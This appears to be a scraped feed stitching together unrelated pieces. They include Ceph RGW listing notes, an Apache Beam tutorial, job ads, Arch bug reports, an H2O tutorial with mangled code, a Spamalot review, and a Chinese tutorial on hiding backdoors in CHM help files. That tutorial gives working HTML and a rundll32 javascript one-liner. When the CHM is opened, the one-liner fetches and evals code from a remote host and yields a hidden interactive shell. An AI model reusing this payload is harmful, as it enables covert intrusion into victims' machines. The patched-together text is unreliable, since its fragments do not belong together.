<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/"> <Name>hdg2-gcp-bossweb</Name> <Prefix>bosswebfiles/attachment/</Prefix> <Marker /> <NextMarker>bosswebfiles/attachment/152828637501198245d2a-e1a4-46e6-9502-648959a7045a.jpg</NextMarker> <MaxKeys>1000</MaxKeys> <Delimiter>/</Delimiter> <IsTruncated>true</IsTruncated> <Contents> <Key>bosswebfiles/attachment/1495115517299a0165c74-4ca4-4c2f-9d66-2e89fbaeef8c.jpg</Key> <LastModified>2017-05-18T13:51:57.000Z</LastModified> <ETag>"50d0c18045f9b92ae52a66cf4d82701b"</ETag> <Size>402987</Size> <StorageClass>STANDARD</StorageClass> <Owner> <ID>p-gcp</ID> <DisplayName>p-gcp</DisplayName> </Owner> </Contents> ... <Contents> <Key>bosswebfiles/attachment/152828637501198245d2a-e1a4-46e6-9502-648959a7045a.jpg</Key> <LastModified>2018-06-06T11:59:35.000Z</LastModified> <ETag>"7cbcd767f1a282f48b6ed0f7ec2f4fa2"</ETag> <Size>160286</Size> <StorageClass>STANDARD</StorageClass> <Owner> <ID>p-gcp</ID> <DisplayName>p-gcp</DisplayName> </Owner> </Contents> </ListBucketResult>

总结: / bosswebfiles/attachment/152828637501198245d2a-e1a4-46e6-9502-648959a7045a.jpg s3cmd自动获取下一页object

请求如下:


ceph-rgw-delimiter-and-nextmarker

响应如下:

<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/"> <Name>hdg2-gcp-bossweb</Name> <Prefix>bosswebfiles/attachment/</Prefix> <Marker>bosswebfiles/attachment/152828637501198245d2a-e1a4-46e6-9502-648959a7045a.jpg</Marker> <MaxKeys>1000</MaxKeys> <Delimiter>/</Delimiter> <IsTruncated>false</IsTruncated> <Contents> <Key>bosswebfiles/attachment/15282863820674cab8349-5b34-46df-9f92-c03349080d3e.png</Key> <LastModified>2018-06-06T11:59:42.000Z</LastModified> <ETag>"fdf990d0c7e8abe0e4e251cce657d7bf"</ETag> <Size>1353613</Size> <StorageClass>STANDARD</StorageClass> <Owner> <ID>p-gcp</ID> <DisplayName>p-gcp</DisplayName> </Owner> </Contents> ... </ListBucketResult>

总结: / bosswebfiles/attachment/152828637501198245d2a-e1a4-46e6-9502-648959a7045a.jpg 问题分析

从上面两个的返回结果可以知道,对于object在逻辑上处于子目录下时,如果不使用 delimiter和prefix=dir 的话是只返回前面1000个文件,而且 IsTruncated=True ,但是 没有返回值NextMarker

在luminous版本测试发现已经没有这个问题了。 delimiter作用示例

在文件 ceph/src/rgw/rgw_rados.cc 的函数 RGWRados::Bucket::List::list_objects 的前面注释有如下说明:

delim: do not include results that match this string. Any skipped results will have the matching portion of their name inserted in common_prefixes with a “true” mark.

官方文档说明:( http://docs.ceph.com/docs/master/radosgw/s3/bucketops/)

delimiter:The delimiter between the prefix and the rest of the object name.

delimiter=“/” 的实际表现就是:将object名字以 / 作为目录分隔符,去按照目录层级显示;因此如果将其设置为 - ,即表示按照短横线作为目录分隔符去层级显示,如下例:


ceph-rgw-delimiter-and-nextmarker

<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/"> <Name>hdg2-gcp-bossweb</Name> <Prefix /> <Marker /> <NextMarker>bosswebfiles/attachment/152828637501198245d2a-</NextMarker> <MaxKeys>1000</MaxKeys> <Delimiter>-</Delimiter> <IsTruncated>true</IsTruncated> <EncodingType>url</EncodingType> <CommonPrefixes> <Prefix>bosswebfiles/attachment/1495115517299a0165c74-</Prefix> </CommonPrefixes> <CommonPrefixes> <Prefix>bosswebfiles/attachment/1495115925293a32229a9-</Prefix> </CommonPrefixes> ... </ListBucketResult>

继续一级一级执行如下:

python list_bucket.py bosswebfiles/attachment/152828637501198245d2a- DIR bosswebfiles/attachment/152828637501198245d2a-e1a4- python list_bucket.py bosswebfiles/attachment/152828637501198245d2a-e1a4- DIR bosswebfiles/attachment/152828637501198245d2a-e1a4-46e6- python list_bucket.py bosswebfiles/attachment/152828637501198245d2a-e1a4-46e6- DIR bosswebfiles/attachment/152828637501198245d2a-e1a4-46e6-9502- python list_bucket.py bosswebfiles/attachment/152828637501198245d2a-e1a4-46e6-9502- 2018-06-06 11:59:35+00:00 bosswebfiles/attachment/152828637501198245d2a-e1a4-46e6-9502-648959a7045a.jpg 160286 "7cbcd767f1a282f48b6ed0f7ec2f4fa2"


          Hands on Apache Beam, building data pipelines in Python      Cache   Translate Page      

Hands on Apache Beam, building data pipelines in Python

Apache Beam is an open-source SDK which allows you to build multiple data pipelines from batch or stream based integrations and run it in a direct or distributed way. You can add various transformations in each pipeline. But the real power of Beam comes from the fact that it is not based on a specific compute engine and therefore is platform independant. You declare which “runner” you want to use to compute your transformation. It is using your local computing resource by default, but you can specify a Spark engine for example or Cloud Dataflow…

In this article, I will create a pipeline ingesting a csv file, computing the mean of the Open and Close columns fo a historical S&P500 dataset. The goal here is not to give an extensive tutorial on Beam features, but rather to give you an overall idea of what you can do with it and if it is worth for you going deeper in building custom pipelines with Beam. Though I only write about batch processing, streaming pipelines are a powerful feature of Beam!

Beam’s SDK can be used in various languages, Java, python… however in this article I will focus on Python.


Hands on Apache Beam, building data pipelines in Python
Installation

At the date of this article Apache Beam (2.8.1) is only compatible with Python 2.7, however a Python 3 version should be available soon. If you have python-snappy installed, Beam may crash. This issue is known and will be fixed in Beam 2.9.

pip install apache-beam Creating a basic pipeline ingesting CSV Data

For this example we will use a csv containing historical values of the S&P 500. The data looks like that:

Date,Open,High,Low,Close,Volume 03 01 00,1469.25,1478,1438.359985,1455.219971,931800000 04 01 00,1455.219971,1455.219971,1397.430054,1399.420044,1009000000 Basic pipeline

To create a pipeline, we need to instantiate the pipeline object, eventually pass some options, and declaring the steps/transforms of the pipeline.

import apache_beam as beam from apache_beam.options.pipeline_options import PipelineOptions options = PipelineOptions() p = beam.Pipeline(options=options)

From the beam documentation:

Use the pipeline options to configure different aspects of your pipeline, such as the pipeline runner that will execute your pipeline and any runner-specific configuration required by the chosen runner. Your pipeline options will potentially include information such as your project ID or a location for storing files.

The PipelineOptions() method above is a command line parser that will read any standard option passed the following way:

--<option>=<value> Custom options

You can also build your custom options. In this example I set an input and an output folder for my pipeline:

<strong>class</strong> <strong>MyOptions</strong>(PipelineOptions): @classmethod
def _add_argparse_args(cls, parser):
parser.add_argument('--input',
help='Input for the pipeline',
default='./data/')
parser.add_argument('--output',
help='Output for the pipeline',
default='./output/') Transforms principles

In Beam, data is represented as a PCollection object. So to start ingesting data, we need to read from the csv and store this as a PCollection to which we can then apply transformations. The Read operation is considered as a transform and follows the syntax of all transformations:

[Output PCollection] <strong>=</strong> [Input PCollection] <strong>|</strong> [Transform]

These tranforms can then be chained like this:

[Final Output PCollection] = ([Initial Input PCollection] | [First Transform]
| [Second Transform]
| [Third Transform])

The pipe is the equivalent of an apply method.

The input and output PCollections, as well as each intermediate PCollection are to be considered as individual data containers. This allows to apply multiple transformations to the same PCollection as the initial PCollection is immutable. For example:

[Output PCollection 1] = [Input PCollection] | [Transform 1]
[Output PCollection 2] = [Input PCollection] | [Transform 2] Reading input data and writing outputdata

So let’s start by using one of the readers provided to read our csv, not forgetting to skip the header row:

csv_lines = (p | ReadFromText(input_filename, skip_header_lines=1) | ...

At the other end of our pipeline we want to output a text file. So let’s use the standard writer:

... <strong>|</strong> beam<strong>.</strong>io<strong>.</strong>WriteToText(output_filename) Transforms

Now we want to apply some transformations to our PCollection created with the Reader function. Transforms are applied to each element of the PCollection individually.

Depending on the worker that you chose, your transforms can be distributed. Instances of your transformation are then executed on each node.

The user code running on each worker generates the output elements that are ultimately added to the final output PCollection that the transform produces.

Beam has core methods (ParDo, Combine) that allows to apply a custom transform, but also has pre written transforms called composite transforms . In our example we will use the ParDo transform to apply our own functions.

We have read our csv into a PCollection , so let’s split it so we can access the Date and Close items:

… beam.ParDo(Split()) …

And define our split function so we only retain the Date and Close and return it as a dictionnary:

class Split(beam.DoFn): def process(self, element): Date,Open,High,Low,Close,Volume = element.split(“,”) return [{ ‘Open’: float(Open), ‘Close’: float(Close), }]

Now that we have the data we need, we can use one of the standard combiners to calculate the mean over the entire PCollection.

The first thing to do is to represent the data as a tuple so we can group by a key and then feed CombineValues with what it expects. To do that we use a custom function “CollectOpen()” which returns a list of tuples containing (1, <open_value>).

class CollectOpen(beam.DoFn): def process(self, element): # Returns a list of tuples containing Date and Open value result = [(1, element[‘Open’])] return result

The first parameter of the tuple is fixed since we want to calculate the mean over the whole dataset, but you can make it dynamic to perform the next transform only on a sub-set defined by that key.

The GroupByKey function allows to create a PCollection of all
          T-SQL Tuesday – Non-SQL Server Technologies      Cache   Translate Page      

MJTuesday

So, this month’s T-SQL Tuesday topic is to think about a non-SQL Server technology that we want to learn.

For me, I’m going to pick machine learning.

As a DBA, I’ve always looked at machine learning as a thing for the BI guys.  I’m a DBA after all why do I care about that?

Well, my attitude has changed somewhat recently.  This little change all started when I listened to Alex Whittles’ keynote talk at Data Relay.  He presented a demo where a computer program used Python (I’m already a huge fan of Python in SQL Server as you may know) and SciPy (a machine learning, data sciencey type module) to play and learn a game.  Alex demonstrated how, over time his robot was able to increase it’s score through machine learning algorithms.

WOW, myself and Adrian looked at each other as a little light bulb come on over our heads.  For the rest of the conference I attended a number of sessions that I wouldn’t normally attend, stuff for the BI guys.  A great session from Terry McCann and an interesting one from Simon Whiteley really got the creative juices flowing.  Could the DBA use this technology to model things like performance trends, predict capacity and answer that question that we’re always asked, “have we got room on the SQL Server for just one more DB?”.

So where do I go from here?  My first port of call is going to get my head around Python, I’ve got a background in C programming to that shouldn’t be too difficult.  Once I’m happy with that, it’ll be a case of hitting the blogs, courses, books and anything else that I can get my hands on to help understand the strange mysteries that are Machine Learning.

Where can I go with this?  As DBAs, we’ve got a ton of data available to us in DBVs, Query Store, etc.  Wouldn’t it be great if we could hook a little robot into all that and start building up models of how our servers behave.  Keep an eye out for the inevitable blog post that are going to come out of it.

 


          Why Use Django Framework?       Cache   Translate Page      

When you hear Python, Django is the first framework that comes to your mind. It is undoubtedly the most popular framework that eases your course as a developer. There’s clearly a number of reasons why Django Development Services has the maximum support from developers. Here we will list out a few that should get you on-board Django too. Django is fast. What does this statement mean? When you want to develop an application with this framework, the time taken is less, the efficiency high Read More..
          Business Intelligence Analyst (Business Objects experience is required) - Calance US - Los Angeles, CA      Cache   Translate Page      
Experience with Tableau or other data visualization tools is preferred, along with experience with R, Python, NoSQL technologies such as Hadoop, Cassandra,...
From Calance - Thu, 01 Nov 2018 18:20:38 GMT - View all Los Angeles, CA jobs
          Business Intelligence Analyst - Latham & Watkins LLP - Los Angeles, CA      Cache   Translate Page      
Experience with Tableau or other data visualization tools is preferred, along with experience with R, Python, NoSQL technologies such as Hadoop, Cassandra,...
From Latham & Watkins LLP - Sat, 18 Aug 2018 05:12:35 GMT - View all Los Angeles, CA jobs
          Telecommute Cloud Data Engineer      Cache   Translate Page      
A technology company is in need of a Telecommute Cloud Data Engineer. Candidates will be responsible for the following: Designing data import and ETL processes Validating and troubleshooting data transformation and loading into SQL and noSQL databases Documenting findings, test results, and as-built configurations Must meet the following requirements for consideration: Must be able to perform data manipulation and transformation Querying SQL databases or modifying SQL statements to produce custom results Knowledge of a scripting language such as Python, Perl or Java Excellent analysis, problem-solving and organization skills Proficient with Microsoft Visio, Word and Excel Able to work on multiple projects at a time with minimal supervision
          SSIS Best Online Training (KOLKATA)      Cache   Translate Page      
SQL School is one of the best training institutes for Microsoft SQL Server Developer Training, SQL DBA Training, MSBI Training, Power BI Training, Azure Training, Data Science Training, Python Training, Hadoop Training, Tableau Training, Machine Learning Training, Oracle PL SQL Training. We have been providing Classroom Training, Live-Online Training, On Demand Video Training and Corporate trainings. All our training sessions are COMPLETELY PRACTICAL. SSIS COURSE DETAILS - FOR ONLINE TRAINING: SQL ...
          Web/Networking Programming Task.      Cache   Translate Page      
a simple web-based solution that allows you to measure the offset between the clock on the system that runs a browser and a web server. The idea for this problem was inspired by website http://time.is/... (Budget: $10 USD, Jobs: Javascript, Linux, Network Administration, PHP, Python)
          Machine Learning Algorithm Dev - $1000 ref fee - ROSS Recruitment - North York, ON      Cache   Translate Page      
Python and/or .NET (C# or VB) is a plus. Our client is a well-established leader in online sports gaming with a Technical Centre of Excellence at Yonge and...
From ROSS Recruitment - Sat, 29 Sep 2018 04:00:33 GMT - View all North York, ON jobs
          FS#60725: [seabios] File conflict /usr/share/qemu/vgabios-virtio.bin      Cache   Translate Page      
Description: Updating my sytems results in a file conflict on /usr/share/qemu/vgabios-virtio.bin.


Additional info:
* qemu 3.0.0-3
* seabios 1.11.0-1 → 1.11.0-2


Steps to reproduce:

$ sudo LANG=C pacman -Syyu
:: Synchronizing package databases...
core 136.1 KiB 1944K/s 00:00 [######################] 100%
extra 1651.9 KiB 5.43M/s 00:00 [######################] 100%
community 4.7 MiB 5.23M/s 00:01 [######################] 100%
multilib 174.8 KiB 6.32M/s 00:00 [######################] 100%
:: Starting full system upgrade...
resolving dependencies...
looking for conflicting packages...

Packages (22) brltty-5.6-6 ffmpeg-1:4.1-1 gdm-3.30.2-1
gobject-introspection-runtime-1.58.0+8+gfdaa3b1a-1
harfbuzz-2.1.1-1 harfbuzz-icu-2.1.1-1 lib32-harfbuzz-2.1.1-1
lib32-systemd-239.300-1 libgdm-3.30.2-1 libsystemd-239.300-1
mpv-1:0.29.1-3 pangomm-2.42.0-1 pipewire-0.2.3+17+g10ce1a02-1
python-pyparsing-2.3.0-1 python-sphinx-1.8.1-2
python-urllib3-1.24.1-1 ruby-sass-3.6.0-1 seabios-1.11.0-2
subversion-1.11.0-1 systemd-239.300-1 tracker-2.1.6-2
usbmuxd-1.1.0+48+g1cc8b34-1

Total Installed Size: 153.16 MiB
Net Upgrade Size: 2.46 MiB

:: Proceed with installation? [Y/n]
(22/22) checking keys in keyring [######################] 100%
(22/22) checking package integrity [######################] 100%
(22/22) loading package files [######################] 100%
(22/22) checking for file conflicts [######################] 100%
error: failed to commit transaction (conflicting files)
seabios: /usr/share/qemu/vgabios-virtio.bin exists in filesystem (owned by qemu)
Errors occurred, no packages were upgraded.

          FS#60724: [systemd] update to 239.300-1 crashes session      Cache   Translate Page      
My sessions just crashed during a, or rather, because of a, system upgrade and i believe the reason to be the systemd package.

The journal states:
systemd[1]: Reexecuting.

And everything running got SIGTERM’ed.

TTYs were not available for some time after that
>systemd-logind[828]: Failed to start autovt@tty2.service: Transport endpoint is not connected
, but eventually lightdm successfully restarted itself.

relevant pacman log excerpt:
[2018-11-06 23:28] [PACMAN] Running 'pacman -S -y --config /etc/pacman.conf --'
[2018-11-06 23:28] [PACMAN] synchronizing package lists
[2018-11-06 23:28] [PACMAN] Running 'pacman -S --ignore -u --config /etc/pacman.conf -- libsystemd systemd systemd-sysvcompat brltty gdm harfbuzz harfbuzz-icu libgdm openmpi usbmuxd firefox-developer-edition python-sphinx lib32-harfbuzz lib32-systemd'
[2018-11-06 23:28] [PACMAN] starting full system upgrade
[2018-11-06 23:28] [ALPM] transaction started
[2018-11-06 23:28] [ALPM] upgraded libsystemd (239.2-1 -> 239.300-1)
[2018-11-06 23:28] [ALPM] warning: /etc/systemd/system.conf installed as /etc/systemd/system.conf.pacnew
[2018-11-06 23:28] [ALPM] upgraded systemd (239.2-1 -> 239.300-1)
[2018-11-06 23:28] [ALPM] upgraded systemd-sysvcompat (239.2-1 -> 239.300-1)
[2018-11-06 23:28] [ALPM] upgraded brltty (5.6-5 -> 5.6-6)
[2018-11-06 23:28] [ALPM] upgraded libgdm (3.30.1-1 -> 3.30.2-1)
[2018-11-06 23:28] [ALPM] upgraded harfbuzz (2.1.0-1 -> 2.1.1-1)
[2018-11-06 23:28] [ALPM] upgraded usbmuxd (1.1.0+28+g46bdf3e-1 -> 1.1.0+48+g1cc8b34-1)
[2018-11-06 23:28] [ALPM] upgraded harfbuzz-icu (2.1.0-1 -> 2.1.1-1)
[2018-11-06 23:28] [ALPM] upgraded gdm (3.30.1-1 -> 3.30.2-1)
[2018-11-06 23:28] [ALPM] upgraded openmpi (3.1.2-1 -> 3.1.3-1)
[2018-11-06 23:28] [ALPM] transaction interrupted

          Senior Data Analyst - William E. Wecker Associates, Inc. - Jackson, WY      Cache   Translate Page      
Experience in data analysis and strong computer skills (we use SAS, Stata, R and S-Plus, Python, Perl, Mathematica, and other scientific packages, and standard...
From William E. Wecker Associates, Inc. - Mon, 22 Oct 2018 06:14:12 GMT - View all Jackson, WY jobs
          Geo Specialist      Cache   Translate Page      
Voor een uitvoeringsorganisatie in Zuid Holland zijn wij op zoek naar een Geo-specialist (24 uur), die wijzigingen aan het datamodel gaat realiseren. Taken: Realiseren van bedachte technische oplossingen Deelnemen aan scrum-sessies Documenteren van gerealiseerde wijzigingen Vereisten: Afgeronde HBO opleiding Ervaring met werken met een scrum-methode Ervaring met de ESRI ArcGIS productsuite (ArcMap, ArcGIS Pro, ArcGIS Enterprise, ArcGIS Online) Ervaring met Data Interoperability Ervaring met Python scripting Ervaring met OTAP omgeving Ervaring met het werken bij een overheidsinstantie Competenties: Teamspeler Resultaatgericht Pro actief Communicatief vaardig Flexibel Kwaliteitsgericht Bij het ontvangen van uw motivatie en c...
          Junior to Mid DevOps - Python      Cache   Translate Page      
MN-Minneapolis, job summary: Acts as a lead in providing application design guidance and consultation, utilizing a thorough understanding of applicable technology, tools and existing designs. Analyzes highly complex business requirements, designs and writes technical specifications to design or redesign complex computer platforms and applications. Provides coding direction to less experienced staff or develops hi
          ‘How do neural nets learn?’ A step by step explanation using the H2O Deep Learning algorithm.      Cache   Translate Page      
In my last blogpost about Random Forests I introduced the codecentric.ai Bootcamp. The next part I published was about Neural Networks and Deep Learning. Every video of our bootcamp will have example code and tasks to promote hands-on learning. While the practical parts of the bootcamp will be using Python, below you will find the English R version of this Neural Nets Practical Example, where I explain how neural nets learn and how the concepts and techniques translate to training neural nets in R with the H2O Deep Learning function. You can find the video on YouTube but as, as before, it is only available in German. Same goes for the slides, which are also currently German only. See the end of this article for the embedded video and slides. Neural Nets and Deep Learning Just like Random Forests, neural nets are a method for machine learning and can be used for supervised, unsupervised and reinforcement learning. The idea behind neural nets has already been developed back in the 1940s as a way to mimic how our human brain learns. That’s way neural nets in machine learning are also called ANNs (Artificial Neural Networks). When we say Deep Learning, we talk about big and complex neural nets, which are able to solve complex tasks, like image or language understanding. Deep Learning has gained traction and success particularly with the recent developments in GPUs and TPUs (Tensor Processing Units), the increase in computing power and data in general, as well as the development of easy-to-use frameworks, like Keras and TensorFlow. We find Deep Learning in our everyday lives, e.g. in voice recognition, computer vision, recommender systems, reinforcement learning and many more. The easiest type of ANN has only node (also called neuron) and is called perceptron. Incoming data flows into this neuron, where a result is calculated, e.g. by summing up all incoming data. Each of the incoming data points is multiplied with a weight; weights can basically be any number and are used to modify the results that are calculated by a neuron: if we change the weight, the result will change also. Optionally, we can add a so called bias to the data points to modify the results even further. But how do neural nets learn? Below, I will show with an example that uses common techniques and principles. Libraries First, we will load all the packages we need: tidyverse for data wrangling and plotting readr for reading in a csv h2o for Deep Learning (h2o.init initializes the cluster) library(tidyverse) library(readr) library(h2o) h2o.init(nthreads = -1) ## Connection successful! ## ## R is connected to the H2O cluster: ## H2O cluster uptime: 3 hours 46 minutes ## H2O cluster timezone: Europe/Berlin ## H2O data parsing timezone: UTC ## H2O cluster version: 3.20.0.8 ## H2O cluster version age: 1 month and 16 days ## H2O cluster name: H2O_started_from_R_shiringlander_jpa775 ## H2O cluster total nodes: 1 ## H2O cluster total memory: 3.16 GB ## H2O cluster total cores: 8 ## H2O cluster allowed cores: 8 ## H2O cluster healthy: TRUE ## H2O Connection ip: localhost ## H2O Connection port: 54321 ## H2O Connection proxy: NA ## H2O Internal Security: FALSE ## H2O API Extensions: XGBoost, Algos, AutoML, Core V3, Core V4 ## R Version: R version 3.5.1 (2018-07-02) Data The dataset used in this example is a customer churn dataset from Kaggle. Each row represents a customer, each column contains customer’s attributes We will load the data from a csv file: telco_data % select_if(is.numeric) %__% gather() %__% ggplot(aes(x = value)) + facet_wrap(~ key, scales = "free", ncol = 4) + geom_density() ## Warning: Removed 11 rows containing non-finite values (stat_density). … and barcharts for categorical variables. telco_data %__% select_if(is.character) %__% select(-customerID) %__% gather() %__% ggplot(aes(x = value)) + facet_wrap(~ key, scales = "free", ncol = 3) + geom_bar() Before we can work with h2o, we need to convert our data into an h2o frame object. Note, that I am also converting character columns to categorical columns, otherwise h2o will ignore them. Moreover, we will need our response variable to be in categorical format in order to perform classification on this data. hf % mutate_if(is.character, as.factor) %__% as.h2o Next, I’ll create a vector of the feature names I want to use for modeling (I am leaving out the customer ID because it doesn’t add useful information about customer churn). hf_X
          BWW Review: SPAMALOT at Lied Center For Performing Arts, Lincoln      Cache   Translate Page      

I don't like Spam. To me, it's mystery meat and I don't like the taste. I looked it up on the internet to see what it is made from. It was introduced by Hormel in 1937 to increase the sale of pork shoulder. Few know the true origination of the name "Spam," but suggestions include "Specially Processed Army Meat." My favorite more colorful descriptions are "meatloaf without basic training" and "ham that didn't pass its physical." Spam has recently been adopted as the term for inappropriate or irrelevant messages that flood our inboxes. This all fits.

Contrary to my aforementioned comment, I do like SPAM...A-LOT. It's a real treat precisely because it is tasteless. It's crazy fun with zingers shooting all over the place, people doing the bizarre, and clever little inappropriate messages conveyed with tongue in cheek.

SPAMALOT, also billed as "Monty Python's SPAMALOT, A new musical lovingly ripped off from the motion picture Monty Python and the Holy Grail," is two full hours of delightful nonsense.

The original screenplay was a collaboration of Graham Chapman, John Cleese, Terry Gilliam, Eric Idle, Terry Jones, and Michael Palin. I can only imagine how much fun these men had as they crafted this piece. Perhaps they even formed a dance line and sang silly songs as they marched up to their round table.

John DuPrez and Eric Idle wrote the music and Eric Idle wrote the book and lyrics. The musical opened on Broadway in 2005 and won a Tony Award for Best Musical while being nominated for a total of 14 awards. It went on to capture a Grammy for Best Musical Show Album. SPAMALOT has played in London's West End, Broadway, all across the US and UK, Las Vegas, and at a variety of international locations. It's still going strong. But why? What's in this show?

SPAMALOT is a can filled with a little bit of everything. There are references to scenes from well known musicals such as the bottle dance in FIDDLER ON THE ROOF, the dancing rivalry between the gangs in WEST SIDE STORY, and Barbra Streisand's "People," from FUNNY GIRL. I even sensed a nod to WIZARD OF OZ with their guards and their man behind the puppet. There's a dash of intrigue with James Bond, and a smattering of Las Vegas with glitzy showgirls and inappropriate shenanigans. There's a hint of social issues such as gender identification and same sex marriage, an autocratic government, and differences in religion.

The story heads straight for (well, maybe tipsily toward) a big musical finish. The problem is that Jews are a necessary ingredient for any successful musical. King Arthur and his knights are hard pressed to find Jews in their quest for the Holy Grail. One of the biggest laughs of the evening was King Arthur's sidekick, coconut clapping Patsy telling him that he didn't confess that he himself was Jewish because "it's not the sort of thing you say to a heavily armed Christian."

You may not need Andrew Lloyd Weber for a successful musical, but you do need performers who can play off this offbeat humor with seriousness, sing extremely well, and dance like pros. Steve McCoy (King Arthur) and Kasidy Devlin (Sir Robin) are definitely up to the task and lead a great cast.

Satire, slapstick, irony...it's all mixed up to build a ridiculously successful show that appeals to the crowd. There are too many good jokes to cover them all. My favorite, though, is Not Dead Fred.

The question of not being dead reappears throughout the show. After being around for the past 13 years, SPAMALOT is clearly not dead yet. What a way to bring the new 2018/2019 season to life!

Photo Credit: Scott Suchman


          5 автомобилей-амфибий, которые вы можете купить прямо сейчас      Cache   Translate Page      
Watercar (Фаунтин-Вали, штат Калифорния, США). Пожалуй, самая заметная компания-производитель автомобилей-амфибий. Будучи основанной в 1999 году, она сделала себе имя на производстве «самой быстрой амфибии в мире» (в 2010-м автомобиль Watercar Python попал в Книгу рекордов Гиннесса). Сегодня компания делает одну модель — Watercar Panther с двигателем Honda, поколение которой обновлено в 2017 году. Машины строятся […]
          Python presents slithery situation at Texas Goodwill store      Cache   Translate Page      
FORT WORTH, Texas (AP) — A Goodwill worker collecting clothes and other items at a Texas sorting center was surprised to find an albino python clinging to the side of a bin. The python was huddled in a pile of clothes when the worker discovered it Thursday at the center in Fort Worth. Manager James Murphy says it's not clear if the snake slithered away from its owner and was accidentally dropped off or if its donation was intentional. The python had a serpentine journey: It arrived at one of nearly 40 Goodwill donation drop-offs in the area before being transported to the Fort Worth sorting center. Goodwill staffers will care for the python until the owner claims it or a permanent home is found.
          C++ Developer with Python skills - Experis - Rahway, NJ      Cache   Translate Page      
| Mercury, Segue, Borland. This specialization is usually performed by senior test practitioner with experience in leading large test teams....
From Experis - Tue, 23 Oct 2018 17:42:46 GMT - View all Rahway, NJ jobs
          高级组合技打造捆绑后门及防御建议      Cache   Translate Page      
0×01 CHM简介 在介绍怎么使用CHM来作为后门之前,首先要知道CMH是什么东西。 CHM(Compiled Help Manual)即“已编译的帮助文件”。它是微软新一代的帮助文件格式,利用HTML作源文,把帮助内容以类似数据库的形式编译储存。CHM支持Javas cript、VBs cript、ActiveX、Java Applet、Flash、常见图形文件(GIF、JPEG、PNG)、音频视频文件(MID、WAV、AVI)等等,并可以通过URL与Internet联系在一起。因为使用方便,形式多样也被采用作为电子书的格式。 0×02 CHM制作 CHM的制作方法很多。有多款工具可以使用,这里就不在做详细的介绍了。本次测试使用了EasyCHM来制作CHM文件,使用起来非常简单。 新建如下目录,文件内容随意: 打开EasyCHM,新建->浏览。选择该目录。默认文件类型: 点击确认,即可看到预览的CHM文件: 选择编译,即可编译成CHM文件。 0×03 CHM Execute Command 14年的时候@ithurricanept 在twitter上发了一个demo,通过CHM运行计算器: 利用代码如下: <!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>command exec <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=',calc.exe'> <PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>  将以上代码写入html,置于工程目录进行编译,生成CHM文件,运行此文件,弹出计算器: 0×04 去除弹框 有测试过nishang Out-CHM的同学会发现,运行生成的CHM文件的时候会看到明显的弹框。就像这样: 某个晚上突然脑洞了一下,想到了一个好的方式来让他不显示弹框,即结合使用JavaScript Backdoor。经过测试,成功实现在不弹框的情况下获取meterpreter会话,此次测试使用一个我修改过的python版 JSRat.ps1 ,地址为:https://github.com/Ridter/MyJSRat。使用方式详见 readme。 以下为完整的测试过程: 1.结合CHM + JSBackdoor 使用交互模式的JSRat server: python MyJSRat.py -i 192.168.1.101 -p 8080 访问 http://192.168.1.101:8080/wtf 获取攻击代码如下: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}  经过多次测试,成功将以上命令写入chm,其Html代码为: <!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>This is a demo ! <br><OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET"," http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'> <PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>  编译以后运行,可以成功获取JS交互shell: 直接执行cmd /c command 是会有黑框的,可以使用run来避免显示黑框。执行run以后,输入 whoami […]
          Migration Consultant OpenVMS      Cache   Translate Page      
Migration Consultant (OpenVMS) > Location: Slough > Division: Transoft > Function: Professional Services > Reporting to: Martin Farndale We’re Advanced Join a business that embraces innovation, gives you the scope to seize every opportunity and will help get you where you want to go. Life at Advanced begins in an unprecedented environment with a role that matters, taking you on a fast paced journey of discovery, however big that might be. We’re one of the UK’s largest and fastest growing software companies. True partnership is the defining thing that makes us different from the competition. We pride ourselves on delivering focused software solutions for public sector, enterprise commercial and health & care organisations that simplify complex business challenges and deliver immediate value. Team & Role We are seeking an experienced Migration Consultant with a successful track record of delivering application and data migration solutions from the OpenVMS legacy system. The Migration Consultant will specialise in refactoring legacy systems from 3rd generation languages such as C/C++. This role requires in depth C/C++ skills and extensive real-world experience preferably in a broad range of business software systems. This role involves the application of Transoft technologies to help deliver a sustainable future for crucial business applications. The Requirements You will: Learn and operate the Transoft modernisation toolset Function as an effective project team member Maintain a cooperative nature at all times Maintain the ability to both take instruction and work under own initiative as required. Be able to maintain a sharp focus on and finish intensive projects. Have a good awareness of technological developments and best practice Be able to adapt and apply new ideas as appropriate Successfully hand over solutions to relevant internal or external staff, including knowledge transfer Deliver and promote quality, excellence and continuous service improvement for Professional Services engagements Keep abreast of new features and functions made available within the Advanced 365 suite of products We would like you to have: The successful candidate requires strong consultancy skills and, and is an excellent motivator of individuals in order to meet deadlines and manage change. You will have real-world experience of delivering concurrent small & medium scale projects on time and within budget. Experience needed: 5+ years of C/C++ design, implementation and support In depth experience within Windows and Linux development including operating systems APIs OpenVMS Experience is an advantage Database design and implementation – SQL is a must Modern build and deployment experience (i.e. Gradle, Cmake) Scripting in Perl or Python an advantage Transoft toolset training will be provided Essential Skills: Strong communication skills, written and spoken Well presented and good interpersonal skills Comfortable in both structured and unstructured working environments Energy and enthusiasm to deliver a successful project Comfortable in customer facing role Education / Qualifications A university degree in a relevant subject Join the A Team Insert Key benefits from working 